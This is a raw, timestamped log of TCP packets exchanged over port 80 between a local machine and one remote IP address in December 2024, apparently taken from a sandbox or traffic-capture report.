                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.684884071 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.685663939 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.685720921 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.686289072 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.686362982 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.686772108 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.686912060 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.687093973 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.687186003 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.687829971 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.687886953 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.688127995 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.688179016 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.688931942 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.688999891 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.689016104 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.689039946 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.690047026 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.690104961 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.690140009 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.690184116 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.691068888 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.691361904 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.691407919 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.692195892 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.692734003 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.692780018 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.693258047 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.693305016 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.693310976 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.693674088 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.694355965 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.694415092 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.695046902 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.695097923 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.695528030 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.695581913 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.695605040 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.695631027 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.696505070 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.696603060 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.696655989 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.697596073 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.697648048 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.698023081 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.698074102 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.698724031 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.698781967 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.698849916 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.698889017 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.699814081 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.699861050 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.700295925 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.700340033 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.700884104 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.700928926 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.700978994 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.701020002 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.701946974 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.701992989 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.702176094 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.702553988 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.703022003 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.703077078 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.703135014 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.703207016 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.704207897 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.704260111 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.704262018 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.704511881 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.705272913 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.705307007 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.705359936 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.706537962 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.706563950 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.706619978 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.707397938 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.707429886 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.707490921 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.708506107 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.708568096 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.708605051 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.709536076 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.709603071 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.709707022 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.709760904 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.710686922 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.710736990 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.710796118 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.710858107 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.711791992 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.711838961 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.712429047 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.712486982 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.712826014 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.712878942 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.713623047 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.713668108 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.713896036 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.713943958 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.713952065 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.714543104 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.714987040 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.715029001 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.851067066 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.851125956 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.851701021 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.851730108 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.851746082 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.851773977 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.851799011 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.852684021 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.852730989 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.852852106 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.852910042 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.853651047 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.853699923 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.854036093 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.854078054 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.854866982 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.854918003 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.855038881 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.855104923 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.855998039 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.856053114 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.856653929 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.857000113 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.857054949 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.857665062 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.858160019 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.858181000 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.858216047 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.858232021 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.859272957 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.860295057 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.860313892 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.860343933 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.860349894 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.860380888 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.861424923 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.861474991 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.862270117 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.862421036 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.862467051 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.862530947 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.862624884 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.862832069 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.863562107 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.863603115 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.864037991 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.864079952 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.864520073 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.864566088 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.864846945 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.864895105 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.865792990 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.866451025 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.866503954 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.866910934 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.867077112 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.867130041 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.867851973 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.868051052 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.868107080 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.869039059 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.869055033 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.869095087 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.869127989 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.870034933 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.870049953 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.870101929 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.871141911 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.871157885 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.871206045 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.871468067 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.871530056 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.871581078 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.872558117 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.872611046 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.872688055 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.872735023 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.876040936 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.876105070 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.876162052 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.876203060 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.876224041 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.876399994 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.876482964 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.876636028 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.876770020 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.876820087 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.877681017 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.877696037 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.877737045 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.877737045 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.878779888 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.878830910 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.878959894 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.879048109 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.879856110 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.879904985 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.879987955 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.880043030 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.881141901 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.881793022 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.881855965 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.881958008 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.882122993 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.882188082 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.883078098 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.883260012 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.883327961 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.884059906 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.884109020 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.884223938 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.885201931 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.885245085 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.885260105 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.885284901 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.886456013 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.886472940 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.886523962 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.887378931 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.887571096 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.887624979 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.888537884 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.888592958 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.888700962 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.889791965 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.889846087 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.889976025 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.890733957 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.890738010 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.891072989 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.891124964 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.891706944 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.892026901 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.892081976 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.892864943 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.892918110 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.893332005 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.893949986 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.894001007 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.894114017 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.894996881 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.895090103 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.895843983 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.895900011 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.896157980 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.896173000 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.896224976 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.897281885 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.897296906 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.897352934 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.898260117 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.898325920 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.898408890 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.898457050 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.899516106 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.899532080 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.899581909 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.899581909 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.900655031 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.900671959 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.900712013 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.900743961 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.901629925 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.901685953 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.901793003 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.901851892 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.903026104 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.903362989 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.903425932 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.904305935 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.904323101 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.904362917 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.904391050 CET4976380192.168.2.431.41.244.11
